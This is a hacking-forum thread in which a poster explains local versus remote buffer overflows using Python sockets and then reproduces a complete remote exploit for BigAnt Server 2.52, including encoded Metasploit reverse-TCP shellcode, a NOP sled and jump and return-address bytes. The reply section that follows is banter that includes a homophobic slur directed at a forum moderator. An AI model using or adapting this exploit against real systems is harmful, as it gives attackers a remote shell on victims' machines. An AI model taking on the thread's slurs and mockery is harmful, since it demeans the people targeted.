Difference between Local overflow and Remote - System Security

chroniccommand

[-----------------------------------------]
Paper: Difference between Local overflow and Remote
Written for: iExploit
By: Chroniccommand
[-----------------------------------------]

First, before I begin this paper, I should explain something about sockets. I will be using sockets in Python for this paper. What this will be showing is the difference between a Local Buffer OverFlow and a Remote Buffer Overflow. In a remote overflow, we are sending all the data using sockets over the internet to the remote target. In a local overflow, we have the code on our local drive, and we can play around with the program directly in GDB, where we can disassemble the program and check the registers, etc..
So a socket is going to connect us to the target, where we can send the data through a connection. Take a look at this diagram:(I made it in paint. Don't judge :P)
http://img139.imageshack.us/img139/47/flow1.png
In this diagram "A" is the attacker, and "B" is the remote target. The red line shows the connection we make using sockets. That blue box is the packet that holds the overflow code we will be using. It's going to contain our oveflow code, shellcode, etc.., and travel to "B".
http://img685.imageshack.us/img685/9482/flow2.png
In this diagram, the code is sent right through to the target machine.
http://img168.imageshack.us/img168/7214/flow3.png
Now, all the code has been administered to the target machine, "B", and if it is preformed right the shellcode is executed. If we used shellcode that executes "/bin/sh", we get the SH shell(Unix machines).
Take a look at this code in Python, used to connect to a target machine.


#!/usr/bin/python
import sys, socket 
host = sys&#46;argv&#91;1&#93;
buffer = “\x41” * 300
s = socket&#46;socket(socket&#46;AF_INET, socket&#46;SOCK_STRAEM)
s&#46;connect((host,6660)) 
s&#46;send(buffer + “\r\n\r\n”) 
s&#46;close()

Now we import sys and socket in this code. Host is equal to sys.argv[1], which will make it a command line argument.
Buffer is equal to \x41 times 300, which is used to overflow the remote system.
Now we send the buffer with a socket in python, and connect to it. Once it is sent the socket is closed.
This is the basic's for writing remote overflow codes in Python. Of course, there is much more that needs to be done.

Now the difference is, in a local overflow we can play around with it much more. In a remote overflow, we send all of our data to be used in a socket. This will then preform all your commands. You can think of it as a piece of string. You put a droplet of water on one end. The droplet of water contains all of your shellcode, nops, etc.. And the droplet of water travels down the string to the end, "B", and our code is then delivered to our program. Boom, remote shell.
Take a look at this remote overflow code written in python(Not by me)


#!/usr/bin/python

#BigAnt Server 2&#46;52 remote buffer overflow exploit 2
#Author&#58; DouBle_Zer0
#Vulnerability discovered by Lincoln
#a another version of the original exploit (by Lincoln)
#application is little hazy&#46;&#46;

import sys,socket

host = sys&#46;argv&#91;1&#93;
buffer= \"\x90\" * 20

#&#46;/msfpayload windows/meterpreter/reverse_tcp LHOST=192&#46;168&#46;1&#46;3 R | &#46;/msfencode -e x86/alpha_mixed -t c
#size 643 byte
buffer+= (\"\x89\xe1\xd9\xce\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x49\x49\"
\"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\"
\"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\"
\"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\"
\"\x6c\x49\x78\x4c\x49\x47\x70\x43\x30\x47\x70\x45\x30\x4f\x79\"
\"\x4a\x45\x50\x31\x49\x42\x45\x34\x4e\x6b\x42\x72\x50\x30\x4e\"
\"\x6b\x50\x52\x44\x4c\x4c\x4b\x51\x42\x47\x64\x4e\x6b\x51\x62\"
\"\x44\x68\x46\x6f\x4d\x67\x50\x4a\x51\x36\x45\x61\x4b\x4f\x44\"
\"\x71\x49\x50\x4c\x6c\x45\x6c\x50\x61\x43\x4c\x44\x42\x46\x4c\"
\"\x51\x30\x4a\x61\x4a\x6f\x44\x4d\x46\x61\x4a\x67\x4b\x52\x4a\"
\"\x50\x42\x72\x50\x57\x4c\x4b\x42\x72\x44\x50\x4e\x6b\x42\x62\"
\"\x45\x6c\x47\x71\x48\x50\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49\"
\"\x50\x50\x74\x50\x4a\x47\x71\x48\x50\x50\x50\x4c\x4b\x43\x78\"
\"\x46\x78\x4e\x6b\x51\x48\x47\x50\x43\x31\x49\x43\x49\x73\x47\"
\"\x4c\x51\x59\x4c\x4b\x45\x64\x4c\x4b\x43\x31\x4b\x66\x44\x71\"
\"\x49\x6f\x50\x31\x4f\x30\x4e\x4c\x49\x51\x48\x4f\x46\x6d\x43\"
\"\x31\x4a\x67\x44\x78\x49\x70\x51\x65\x4a\x54\x45\x53\x51\x6d\"
\"\x4a\x58\x45\x6b\x43\x4d\x51\x34\x43\x45\x48\x62\x43\x68\x4e\"
\"\x6b\x46\x38\x51\x34\x43\x31\x4b\x63\x45\x36\x4e\x6b\x44\x4c\"
\"\x50\x4b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4e\x33\x4c\x4b\x44\"
\"\x44\x4c\x4b\x47\x71\x4a\x70\x4c\x49\x43\x74\x51\x34\x51\x34\"
\"\x43\x6b\x51\x4b\x50\x61\x42\x79\x51\x4a\x46\x31\x4b\x4f\x49\"
\"\x70\x46\x38\x43\x6f\x51\x4a\x4e\x6b\x42\x32\x48\x6b\x4d\x56\"
\"\x43\x6d\x50\x68\x46\x53\x46\x52\x45\x50\x43\x30\x43\x58\x43\"
\"\x47\x50\x73\x50\x32\x43\x6f\x42\x74\x45\x38\x50\x4c\x43\x47\"
\"\x46\x46\x47\x77\x49\x6f\x4b\x65\x4c\x78\x4e\x70\x45\x51\x47\"
\"\x70\x47\x70\x45\x79\x48\x44\x43\x64\x42\x70\x42\x48\x44\x69\"
\"\x4b\x30\x42\x4b\x47\x70\x4b\x4f\x48\x55\x50\x50\x46\x30\x46\"
\"\x30\x46\x30\x43\x70\x50\x50\x47\x30\x46\x30\x43\x58\x4a\x4a\"
\"\x44\x4f\x49\x4f\x49\x70\x4b\x4f\x4b\x65\x4a\x37\x50\x6a\x44\"
\"\x45\x43\x58\x4f\x30\x4e\x48\x47\x71\x44\x43\x45\x38\x45\x52\"
\"\x43\x30\x44\x51\x43\x6c\x4e\x69\x49\x76\x50\x6a\x42\x30\x50\"
\"\x56\x46\x37\x50\x68\x4a\x39\x4d\x75\x44\x34\x50\x61\x4b\x4f\"
\"\x4b\x65\x4f\x75\x4b\x70\x42\x54\x44\x4c\x4b\x4f\x42\x6e\x47\"
\"\x78\x44\x35\x4a\x4c\x43\x58\x4a\x50\x48\x35\x4d\x72\x43\x66\"
\"\x4b\x4f\x4a\x75\x50\x6a\x47\x70\x43\x5a\x45\x54\x46\x36\x43\"
\"\x67\x42\x48\x44\x42\x49\x49\x4f\x38\x51\x4f\x4b\x4f\x4b\x65\"
\"\x4e\x6b\x47\x46\x50\x6a\x51\x50\x42\x48\x45\x50\x42\x30\x43\"
\"\x30\x45\x50\x50\x56\x42\x4a\x45\x50\x42\x48\x51\x48\x4c\x64\"
\"\x46\x33\x4a\x45\x49\x6f\x4e\x35\x4a\x33\x43\x63\x42\x4a\x45\"
\"\x50\x46\x36\x43\x63\x50\x57\x50\x68\x44\x42\x48\x59\x4f\x38\"
\"\x43\x6f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x51\x39\x4f\x36\x4c\"
\"\x45\x49\x66\x43\x45\x48\x6c\x4b\x73\x44\x4a\x41\x41\")
buffer+= \"\x90\" * 294
buffer+= \"\xe9\x4c\xfc\xff\xff\"  #near jmp -----&gt; shellcode
buffer+= \"\xeb\xf9\x90\x90\"      #short jmp ----&gt; near jmp
buffer+= \"\x95\x32\x9a\x0f\"      #p/p/r(partial overwrite is not possible as far as i know) 
buffer+= \"\x41\" * 1000           #play
s = socket&#46;socket(socket&#46;AF_INET, socket&#46;SOCK_STREAM)
s&#46;connect((host,6660))
s&#46;send(\"USV \" + buffer + \"\r\n\r\n\")
s&#46;close()

If you see, this is all of our overflow information, just packed into variables and sent over the socket.

--Chroniccommand

Xin

Nice paper dude :), btw you know when i said *please wait while i google answer* i know the difference that was meant to be a joke as what plastic was thinking

chroniccommand

said:

Nice paper dude :), btw you know when i said *please wait while i google answer* i know the difference that was meant to be a joke as what plastic was thinking

Lol yea I know. Plastic == Disaster
Fag mod from F3
I bet he doesn't understand this at all. Let him go back to his skiddy VB coding crypters :P

Xin

said:

said:

Nice paper dude :), btw you know when i said *please wait while i google answer* i know the difference that was meant to be a joke as what plastic was thinking

Lol yea I know. Plastic == Disaster
Fag mod from F3
I bet he doesn't understand this at all. Let him go back to his skiddy VB coding crypters :P

Haha thats probably true he wont understand. i got warned for it on F3

chroniccommand

said:

said:

said:

Nice paper dude :), btw you know when i said *please wait while i google answer* i know the difference that was meant to be a joke as what plastic was thinking

Lol yea I know. Plastic == Disaster
Fag mod from F3
I bet he doesn't understand this at all. Let him go back to his skiddy VB coding crypters :P

Haha thats probably true he wont understand. i got warned for it on F3

Lol. You know what that means? He's a 10 year old, who cant handle something like rejection or the fact he cant code, or hack for his life. I saw a thread on F3 and I asked him why he uses winblows. His answer:
"because it looks good"
lmfao......... I lol'ed.
Bet he couldn't install Arch or even Ubuntu if he tried. Probably rm -rf / his drive hahah.

Xin

said:

said:

said:

said:

Nice paper dude :), btw you know when i said *please wait while i google answer* i know the difference that was meant to be a joke as what plastic was thinking

Lol yea I know. Plastic == Disaster
Fag mod from F3
I bet he doesn't understand this at all. Let him go back to his skiddy VB coding crypters :P

Haha thats probably true he wont understand. i got warned for it on F3

Lol. You know what that means? He's a 10 year old, who cant handle something like rejection or the fact he cant code, or hack for his life. I saw a thread on F3 and I asked him why he uses winblows. His answer:
"because it looks good"
lmfao......... I lol'ed.
Bet he couldn't install Arch or even Ubuntu if he tried. Probably rm -rf / his drive hahah.

Haha , yeah so are you banned on F3?

chroniccommand

said:

said:

said:

said:

said:

Nice paper dude :), btw you know when i said *please wait while i google answer* i know the difference that was meant to be a joke as what plastic was thinking

Lol yea I know. Plastic == Disaster
Fag mod from F3
I bet he doesn't understand this at all. Let him go back to his skiddy VB coding crypters :P

Haha thats probably true he wont understand. i got warned for it on F3

Lol. You know what that means? He's a 10 year old, who cant handle something like rejection or the fact he cant code, or hack for his life. I saw a thread on F3 and I asked him why he uses winblows. His answer:
"because it looks good"
lmfao......... I lol'ed.
Bet he couldn't install Arch or even Ubuntu if he tried. Probably rm -rf / his drive hahah.

Haha , yeah so are you banned on F3?

Until tonight at 9 PM
Gonna be funny when I get back on xD

Xin

Haha i cant wait :P

chroniccommand

said:

Haha i cant wait :P

Me too lol. Idk if I'm going to put this post on there. I kinda wanna see people like
"DOOD this r not haxoring. RAT's and VB is hax0ring. 1ll l33t fux0r you with mah VB skillzzz dood"
xD

Xin

Copy and paste what you and him says and put it in the discussion section for a laff :P

chroniccommand

said:

Copy and paste what you and him says and put it in the discussion section for a laff :P

Oh I will. I'll expect stuff like
"Hey i put this in my VB and it said errors were happening everywhere"
and
"dood this arent VB this isnt coding. VB is teh only codez eva!"
and
"WTF!?!?"
xD

Xin

said:

said:

Copy and paste what you and him says and put it in the discussion section for a laff :P

Oh I will. I'll expect stuff like
"Hey i put this in my VB and it said errors were happening everywhere"
and
"dood this arent VB this isnt coding. VB is teh only codez eva!"
and
"WTF!?!?"
xD

Haa, he will be like YOUR the skid as you cant code in vb,
your like
"maybe because i dont want to code in vb , i could do it in mysleep"

chroniccommand

said:

said:

said:

Copy and paste what you and him says and put it in the discussion section for a laff :P

Oh I will. I'll expect stuff like
"Hey i put this in my VB and it said errors were happening everywhere"
and
"dood this arent VB this isnt coding. VB is teh only codez eva!"
and
"WTF!?!?"
xD

Haa, he will be like YOUR the skid as you cant code in vb,
your like
"maybe because i dont want to code in vb , i could do it in mysleep"

Lol I need to code it for school. All I do is code pyPG though. 1200+ lines of python code =D

Bursihido

Thanks for very nice info :)

chroniccommand

said:

Thanks for very nice info :)

Thanks I figured people should know this. Watch out for my next paper:
"All about the stack"
:D[hr]
I had to explain to disaster all about the stack and the PUSH / POP technique lol. Hey, he may have learned something.

Howdy, Stranger!

Top Posters

Who's Online (2)